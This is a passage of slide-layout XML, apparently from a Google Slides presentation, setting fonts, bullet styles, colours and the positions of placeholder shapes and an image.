            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Montserrat"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000D74"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Montserrat"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Google Shape;18;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="162177" y="3545044"/>
            <a:ext cx="4084219" cy="1615351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Google Shape;19;p2"/>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a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>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 Columns">
  <p:cSld name="OBJECT_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="94" name="Shape 94"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="95" name="Google Shape;95;p11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="680888" y="1718407"/>
            <a:ext cx="7702937" cy="2215433"/>
            <a:chOff x="1373656" y="3976979"/>
            <a:chExt cx="10270582" cy="1922785"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="96" name="Google Shape;96;p11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1373656" y="4069464"/>
              <a:ext cx="2430600" cy="1830300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2F2F2"/>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900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="97" name="Google Shape;97;p11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9213638" y="4069464"/>
              <a:ext cx="2430600" cy="1830300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2F2F2"/>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900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="98" name="Google Shape;98;p11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6600311" y="4069464"/>
              <a:ext cx="2430600" cy="1830300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2F2F2"/>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900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="99" name="Google Shape;99;p11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3986983" y="4069464"/>
              <a:ext cx="2430600" cy="1830300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2F2F2"/>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900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="100" name="Google Shape;100;p11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="2554007" y="2796630"/>
              <a:ext cx="69900" cy="2430600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="6CADDF"/>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900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="101" name="Google Shape;101;p11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="5167333" y="2796629"/>
              <a:ext cx="69900" cy="2430600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="6CADDF"/>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900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="102" name="Google Shape;102;p11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="7780661" y="2796629"/>
              <a:ext cx="69900" cy="2430600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="6CADDF"/>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900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="103" name="Google Shape;103;p11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="10393988" y="2796630"/>
              <a:ext cx="69900" cy="2430600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="6CADDF"/>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900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Georgia"/>
                <a:ea typeface="Georgia"/>
                <a:cs typeface="Georgia"/>
                <a:sym typeface="Georgia"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;105;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2861841" y="1781641"/>
            <a:ext cx="1393800" cy="2750100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-285750" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-279400" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-279400" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4818019" y="1781641"/>
            <a:ext cx="1393800" cy="2750100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-285750" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-279400" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-279400" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-304800" lvl="6" marL="3200400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-304800" lvl="7" marL="3657600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-304800" lvl="8" marL="4114800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;107;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="905663" y="1781641"/>
            <a:ext cx="1393800" cy="2750100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-304800" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-298450" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-285750" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-279400" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-279400" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-304800" lvl="5" marL="2743200" rtl="0">
